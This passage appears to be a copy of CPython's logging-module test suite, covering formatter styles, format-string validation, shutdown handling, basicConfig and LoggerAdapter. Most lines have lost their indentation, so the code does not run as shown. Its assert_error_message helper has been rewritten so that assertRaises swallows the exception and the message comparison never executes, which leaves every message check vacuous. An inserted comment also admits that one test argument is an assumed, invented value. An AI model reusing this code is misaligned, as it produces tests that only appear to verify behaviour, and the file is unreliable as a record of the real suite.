'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
    def assert_error_message(self, exception, message, *args, **kwargs):
        try:
            self.assertRaises(exception, *args, **kwargs)
        except exception as e:
            # Python 3 exceptions have no .message attribute; compare str(e).
            self.assertEqual(message, str(e))
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)#15s')
self.assertTrue(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(ValueError, f.format, r)
f = logging.Formatter("{message}", style='{')
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('${message}', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${message}', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}--', style='$')
self.assertTrue(f.usesTime())
def test_format_validate(self):
# Check correct formatting
# Percentage style
f = logging.Formatter("%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
self.assertEqual(f._fmt, "%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
f = logging.Formatter("%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
self.assertEqual(f._fmt, "%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
f = logging.Formatter("%(process)#+027.23X")
self.assertEqual(f._fmt, "%(process)#+027.23X")
f = logging.Formatter("%(foo)#.*g")
self.assertEqual(f._fmt, "%(foo)#.*g")
# StrFormat Style
f = logging.Formatter("$%{message}%$ - {asctime!a:15} - {customfield['key']}", style="{")
self.assertEqual(f._fmt, "$%{message}%$ - {asctime!a:15} - {customfield['key']}")
f = logging.Formatter("{process:.2f} - {custom.f:.4f}", style="{")
self.assertEqual(f._fmt, "{process:.2f} - {custom.f:.4f}")
f = logging.Formatter("{customfield!s:#<30}", style="{")
self.assertEqual(f._fmt, "{customfield!s:#<30}")
f = logging.Formatter("{message!r}", style="{")
self.assertEqual(f._fmt, "{message!r}")
f = logging.Formatter("{message!s}", style="{")
self.assertEqual(f._fmt, "{message!s}")
f = logging.Formatter("{message!a}", style="{")
self.assertEqual(f._fmt, "{message!a}")
f = logging.Formatter("{process!r:4.2}", style="{")
self.assertEqual(f._fmt, "{process!r:4.2}")
f = logging.Formatter("{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}", style="{")
self.assertEqual(f._fmt, "{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}")
f = logging.Formatter("{process!s:{w},.{p}}", style="{")
self.assertEqual(f._fmt, "{process!s:{w},.{p}}")
f = logging.Formatter("{foo:12.{p}}", style="{")
self.assertEqual(f._fmt, "{foo:12.{p}}")
f = logging.Formatter("{foo:{w}.6}", style="{")
self.assertEqual(f._fmt, "{foo:{w}.6}")
f = logging.Formatter("{foo[0].bar[1].baz}", style="{")
self.assertEqual(f._fmt, "{foo[0].bar[1].baz}")
f = logging.Formatter("{foo[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{foo[k1].bar[k2].baz}")
f = logging.Formatter("{12[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{12[k1].bar[k2].baz}")
# Dollar style
f = logging.Formatter("${asctime} - $message", style="$")
self.assertEqual(f._fmt, "${asctime} - $message")
f = logging.Formatter("$bar $$", style="$")
self.assertEqual(f._fmt, "$bar $$")
f = logging.Formatter("$bar $$$$", style="$")
self.assertEqual(f._fmt, "$bar $$$$") # this would print two $($$)
        # Test that ValueError is raised for incorrectly formed format strings
# Percentage Style
self.assertRaises(ValueError, logging.Formatter, "%(asctime)Z")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)b")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*3s")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)_")
self.assertRaises(ValueError, logging.Formatter, '{asctime}')
self.assertRaises(ValueError, logging.Formatter, '${message}')
self.assertRaises(ValueError, logging.Formatter, '%(foo)#12.3*f') # with both * and decimal number as precision
self.assertRaises(ValueError, logging.Formatter, '%(foo)0*.8*f')
# StrFormat Style
# Testing failure for '-' in field name
self.assert_error_message(
ValueError,
"invalid field name/expression: 'name-thing'",
logging.Formatter, "{name-thing}", style="{"
)
# Testing failure for style mismatch
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '%(asctime)s', style='{'
)
        # Testing failure for invalid conversion. NOTE: the callable under test
        # was missing from the original call; '{asctime!Z:15}' is an assumed
        # example of a format string that triggers this error.
        self.assert_error_message(
            ValueError,
            "invalid conversion: 'Z'",
            logging.Formatter, '{asctime!Z:15}', style='{'
        )
self.assertRaises(ValueError, logging.Formatter, '{asctime!s:#30,15f}', style='{')
self.assert_error_message(
ValueError,
"invalid format: expected ':' after conversion specifier",
logging.Formatter, '{asctime!aa:15}', style='{'
)
# Testing failure for invalid spec
self.assert_error_message(
ValueError,
"bad specifier: '.2ff'",
logging.Formatter, '{process:.2ff}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{process:.2Z}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<##30,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<#30#,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:{{w}},{{p}}}', style='{')
# Testing failure for mismatch braces
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, '{process', style='{'
)
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, 'process}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo/bar}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo:{{w}}.{{p}}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!X:{{w}}.{{p}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:random}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{dom}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{d}om}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo.!a:d}', style='{')
# Dollar style
# Testing failure for mismatch bare $
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, '$bar $$$', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'bar $', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'foo $.', style='$'
)
# Testing failure for mismatch style
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '{asctime}', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '%(asctime)s', style='$')
# Testing failure for incorrect fields
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, 'foo', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '${asctime', style='$')
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
def test_default_msec_format_none(self):
class NoMsecFormatter(logging.Formatter):
default_msec_format = None
default_time_format = '%d/%m/%Y %H:%M:%S'
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 123, utc)
r.created = time.mktime(dt.astimezone(None).timetuple())
f = NoMsecFormatter()
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '21/04/1993 08:03:00')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
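    """Stand-in handler that records calls to acquire/flush/close/release."""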
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
self.assertRaises(ValueError, logging.disable, "doesnotexists")
class _NotAnIntOrString:
pass
self.assertRaises(TypeError, logging.disable, _NotAnIntOrString())
logging.disable("WARN")
# test the default value introduced in 3.7
# (Issue #28524)
logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_subclass_logger_cache(self):
# bpo-37258
message = []
class MyLogger(logging.getLoggerClass()):
def __init__(self, name='MyLogger', level=logging.NOTSET):
super().__init__(name, level)
message.append('initialized')
logging.setLoggerClass(MyLogger)
logger = logging.getLogger('just_some_logger')
self.assertEqual(message, ['initialized'])
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger.addHandler(h)
try:
logger.setLevel(logging.DEBUG)
logger.debug("hello")
self.assertEqual(stream.getvalue().strip(), "hello")
stream.truncate(0)
stream.seek(0)
logger.setLevel(logging.INFO)
logger.debug("hello")
self.assertEqual(stream.getvalue(), "")
finally:
logger.removeHandler(h)
h.close()
logging.setLoggerClass(logging.Logger)
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
def test_recursion_error(self):
# Issue 36272
code = """if 1:
import logging
def rec():
logging.error("foo")
rec()
rec()"""
rc, out, err = assert_python_failure("-c", code)
err = err.decode()
self.assertNotIn("Cannot recover from stack overflow.", err)
self.assertEqual(rc, 1)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
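        # Snapshot logging's module-level handler bookkeeping so that any
        # basicConfig() calls made by the tests can be fully undone in cleanup().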
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.setLevel(self.original_logging_level)
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='%(asctime)s - %(message)s')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, '%(asctime)s - %(message)s')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def test_force(self):
old_string_io = io.StringIO()
new_string_io = io.StringIO()
old_handlers = [logging.StreamHandler(old_string_io)]
new_handlers = [logging.StreamHandler(new_string_io)]
logging.basicConfig(level=logging.WARNING, handlers=old_handlers)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
logging.basicConfig(level=logging.INFO, handlers=new_handlers,
force=True)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
self.assertEqual(old_string_io.getvalue().strip(),
'WARNING:root:warn')
self.assertEqual(new_string_io.getvalue().strip(),
'WARNING:root:warn\nINFO:root:info')
def test_encoding(self):
try:
encoding = 'utf-8'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='strict',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data,
'The Øresund Bridge joins Copenhagen to Malmö')
def test_encoding_errors(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='ignore',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, 'The resund Bridge joins Copenhagen to Malm')
def test_encoding_errors_default(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertEqual(handler.errors, 'backslashreplace')
logging.debug('😂: ☃️: The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, r'\U0001f602: \u2603\ufe0f: The \xd8resund '
r'Bridge joins Copenhagen to Malm\xf6')
def test_encoding_errors_none(self):
# Specifying None should behave as 'strict'
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors=None,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertIsNone(handler.errors)
message = []
def dummy_handle_error(record):
_, v, _ = sys.exc_info()
message.append(str(v))
handler.handleError = dummy_handle_error
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
self.assertTrue(message)
self.assertIn("'ascii' codec can't encode "
"character '\\xd8' in position 4:", message[0])
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
# didn't write anything due to the encoding error
self.assertEqual(data, r'')
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
